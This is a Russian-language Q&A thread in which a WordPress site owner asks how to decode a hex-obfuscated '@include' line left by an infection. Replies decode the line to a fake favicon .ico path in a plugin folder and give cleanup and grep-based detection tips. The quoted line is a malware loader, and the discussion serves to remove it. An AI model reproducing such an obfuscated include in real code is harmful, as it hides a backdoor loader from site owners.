# Как расшифровать ссылку вируса на сайте?

Tags: php, html, wordpress, вирусы

На сайте на Wordpress вирус. Нашел один из его файлов, там имеется такая строка:

`@include "\x2fhome\x2fu887\x339/aq\x75ates\x74s.ru\x2fwww/\x77p-co\x6etent\x2fplug\x69ns/r\x65ally\x2dsimp\x6ce-ca\x70tcha\x2ffavi\x63on_7\x381344\x2eico";`

Подскажите пожалуйста как узнать на что она ссылается и удалить вирус?

Comment: ставим вместо `@include` `print` и получаем `/home/u88739/aquatests.ru/www/wp-content/plugins/really-simple-captcha/favicon_781344.ico`

Comment: и с чего вы взяли что это вообще вирус ?)

Comment: @tutankhamun спасибо!

Comment: кстати это называется не "вирус", а "сайт взломали"

Comment: @madfan41k хост-провайдер заблочил сайт, указали на эту строку, когда запросил причину. А до этого сайт редиректил на рекламу.

Comment: @tutankhamun достаточно будет удалить данные ссылки и те файлы куда они ссылаются или нужны еще какие-то действия?

Comment: https://ru.stackoverflow.com/q/58537/186083 https://ru.stackoverflow.com/q/463180/186083

Comment: По хорошему стОит пройтись по сайту и посмотреть не осталось-ли еще чего подозрительного. Тут нужен опыт. Хотя бы посмотрите на наличие новых файлов по дате и на содержание в файлах `eval` и `assert` хотя бы. __Обязательно__ перед всеми действиями (и даже отдельными шагами) делайте __резервную копию__ файлов и базы

Comment: Если умеете хоть немного программировать или хотя бы пользоваться grep'ом можно еще обратить внимание на излишнее экранирование символов (искать `/\\x[0-9a-f]{2}/'i`) и избыточное использование функций `chr`, `base64_decode`, `rot13`